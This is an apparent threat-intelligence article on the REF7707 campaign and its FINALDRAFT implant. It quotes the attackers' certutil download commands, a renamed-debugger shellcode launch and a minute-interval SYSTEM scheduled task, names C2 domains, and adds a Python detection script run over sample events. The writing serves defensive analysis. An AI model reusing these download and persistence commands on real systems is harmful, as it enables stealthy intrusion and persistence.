A sophisticated hacking campaign, known as “REF7707,” has recently come to light, thanks to the diligent efforts of Elastic Security Labs. This campaign has been targeting both Windows and Linux systems with an array of novel malware families, including FINALDRAFT, GUIDLOADER, and PATHLOADER. What sets REF7707 apart is not only its advanced tactics but also its notable lapses in operational security, which have inadvertently exposed additional adversary-owned infrastructure.
The origins of the REF7707 campaign trace back to late November 2024, when Elastic Security Labs detected a cluster of endpoint behavioral alerts emanating from the Foreign Ministry of a South American nation. This initial observation sparked a comprehensive investigation, revealing a sprawling campaign characterized by sophisticated targeting and a well-established operational cadence.
Despite demonstrating high technical competence in certain aspects, the attackers exhibited tactical oversights that led to the exposure of pre-production malware samples and critical infrastructure.
Execution Flow
The execution chain of this campaign began with Microsoft's certutil utility being used to download files from a remote server. The commands observed were:
certutil -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\ProgramData
certutil -urlcache -split -f https://[redacted]/fontdrvhost.rar C:\ProgramData
These certutil downloads were executed through the Windows Remote Management Remote Shell plugin (WinrsHost.exe), which indicates that the attackers already held valid network credentials and were using WinRM for lateral movement within the targeted environment.
At the heart of the REF7707 intrusion set lies FINALDRAFT, an implant with both Windows and Linux variants. Its execution chain relies on an uncommon living-off-the-land binary (LOLBin): the Microsoft-signed debugger CDB.exe, renamed to fontdrvhost.exe. No vulnerability is exploited; the debugger's legitimate script-execution feature is abused to run malicious shellcode supplied through a weaponized config.ini file:
C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData
FINALDRAFT injects shellcode into processes such as mspaint.exe or conhost.exe when no specific target process is supplied. For persistence, the attackers created a Scheduled Task that invokes the renamed debugger every minute with SYSTEM privileges (note the /RL HIGHEST and /RU SYSTEM switches and the task path chosen to resemble a built-in Microsoft task):
schtasks /create /RL HIGHEST /F /tn "\Microsoft\Windows\AppID\EPolicyManager" /tr "C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData" /sc MINUTE /mo 1 /RU SYSTEM
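The three steps above (certutil download from a WinRM shell, a renamed cdb.exe running a script file, and a minute-interval SYSTEM task) each leave a distinct process-creation artifact. The following detection logic is an added example written for this article, not code from Elastic Security Labs or from the campaign; it uses Sysmon Event ID 1 field names (Image, OriginalFileName, CommandLine, ParentImage, User) and runs over constructed sample events that mirror the commands quoted above, with a documentation IP standing in for the redacted download host.

```python
"""Detect the REF7707 execution chain in Sysmon-style process-creation events.

Added example (not Elastic's or the page's code). Field names follow
Sysmon Event ID 1; all events below are constructed for this example.
"""
import re

# Constructed sample telemetry. 203.0.113.10 is a placeholder for the
# redacted download host in the article, not a real indicator.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\winrshost.exe", "User": "CORP\\svc-admin",
     "CommandLine": r"certutil -urlcache -split -f https://203.0.113.10/fontdrvhost.exe C:\ProgramData"},
    {"Image": r"C:\ProgramData\fontdrvhost.exe", "OriginalFileName": "CDB.Exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": r"C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": "CORP\\svc-admin",
     "CommandLine": r'schtasks /create /RL HIGHEST /F /tn "\Microsoft\Windows\AppID\EPolicyManager" /tr "C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData" /sc MINUTE /mo 1 /RU SYSTEM'},
    # Benign control: a developer running the real debugger under its own name.
    {"Image": r"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe",
     "OriginalFileName": "CDB.Exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "User": "CORP\\dev", "CommandLine": "cdb.exe -g -G notepad.exe"},
]


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_certutil_download(ev):
    """certutil used as a downloader (-urlcache -f with a URL).
    Escalate when the parent is winrshost.exe, i.e. a WinRM remote shell."""
    if basename(ev["Image"]) != "certutil.exe":
        return None
    cl = ev["CommandLine"].lower()
    if "-urlcache" in cl and "-f" in cl.split() and re.search(r"https?://", cl):
        sev = "high" if basename(ev["ParentImage"]) == "winrshost.exe" else "medium"
        return ("certutil_download", sev)
    return None


def detect_renamed_cdb(ev):
    """Signed debugger cdb.exe running under a different file name.
    OriginalFileName comes from the PE version resource and survives renaming;
    -cf means the debugger is executing a script file, as in the campaign."""
    if ev.get("OriginalFileName", "").lower() != "cdb.exe":
        return None
    if basename(ev["Image"]) == "cdb.exe":
        return None
    sev = "critical" if re.search(r"\s-cf\s", ev["CommandLine"], re.I) else "high"
    return ("renamed_cdb", sev)


def detect_minute_system_task(ev):
    """schtasks creating a task that fires every minute as SYSTEM."""
    if basename(ev["Image"]) != "schtasks.exe":
        return None
    cl = ev["CommandLine"]
    if (re.search(r"/create", cl, re.I)
            and re.search(r"/sc\s+minute\s+/mo\s+1\b", cl, re.I)
            and re.search(r"/ru\s+system\b", cl, re.I)):
        return ("minute_system_task", "high")
    return None


RULES = (detect_certutil_download, detect_renamed_cdb, detect_minute_system_task)


def scan(events):
    """Return (image, rule, severity) for every rule hit, in event order."""
    hits = []
    for ev in events:
        for rule in RULES:
            result = rule(ev)
            if result:
                hits.append((basename(ev["Image"]), result[0], result[1]))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The renamed-binary check is the one worth keeping even if the file name changes in a later campaign: OriginalFileName is read from the PE version resource and does not change when the attacker renames the file on disk, so any cdb.exe that is not called cdb.exe is suspicious regardless of the disguise chosen. The benign control event shows that a developer running the real debugger from the Windows Kits install path produces no alert.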
For command and control, FINALDRAFT uses Microsoft's Graph API, so that its traffic blends in with legitimate organizational use of Microsoft 365 services and is harder to single out with network-based controls.
The campaign relies heavily on cloud and third-party services for its command and control operations. Domains such as support.vmphere[.]com and update.hobiter[.]com were identified within the malware samples and form part of the adversary-owned infrastructure. REF7707 exemplifies the attackers' ability to combine novel malware with abuse of legitimate, signed tools to remain undetected.
The cross-platform nature of FINALDRAFT, with both Windows and Linux variants, underscores the need for detection and response coverage that spans both operating environments rather than Windows endpoints alone.